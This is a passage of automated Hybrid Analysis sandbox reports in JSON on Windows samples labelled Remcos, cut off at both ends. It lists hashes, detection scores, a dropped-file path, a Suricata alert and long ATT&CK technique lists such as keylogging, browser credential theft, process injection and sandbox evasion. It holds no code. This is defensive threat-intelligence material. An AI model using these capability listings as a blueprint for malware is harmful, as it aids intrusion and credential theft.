"T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain\" (SID: 2042936, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246
https://hybrid-analysis.com/sample/31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246
Hybrid Analysis - Remcos
{"size": 118560, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246", "sha256": "31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246", "av_detect": 44, "vx_family": "Win/grayware_confidence_70%", "threat_score": 35, "threat_level": 1, "verdict": "no verdict", "total_signatures": 8, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27051)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27051)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (99 files)"], "total_file_compositions_imports": 321}, "mitre_attcks": [{"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"31a16cb67f5fc864f4fcb1b945a09e7eaa1a57f5005c77b9e64146fc40716246\" has section name .text with entropy \"6.43049189021\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "avtest-9", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively low confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/grayware_confidence_70% (D)", "origin": "External System"}]}
b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55
https://hybrid-analysis.com/sample/b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55
Hybrid Analysis - Remcos
{"size": 494592, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55", "sha256": "b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55", "av_detect": 88, "vx_family": "Remcos.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 227, "extracted_files": [{"name": "registros.dat", "file_path": "%ALLUSERSPROFILE%\\rmc\\registros.dat", "file_size": 194, "sha256": "62d96865cf3140e1706d420c59a273fc513b6b4cc2b9ac4d95f51ba854a42513", "type_tags": ["data"], "description": "data", "runtime_process": "b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe (PID: 3032)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24247)", "100 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24247)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "34 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "58 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24237)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24237)", "2 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "1 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (100 files)"], "total_file_compositions_imports": 318}, "processes": [{"uid": "00000000-00003032", "name": "b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe", "normalized_path": "C:\\b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55.exe", "sha256": "b682969aa8fd146fc6d9e1c7f21fc0243c5fc2197103d117bb087ca6cbcb7b55"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Digital Certificates", "attck_id": "T1588.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Obtain Capabilities", "attck_id": "T1588", "attck_id_wiki": "https://attack.mitre.org/techniques/T1588"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 16}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", 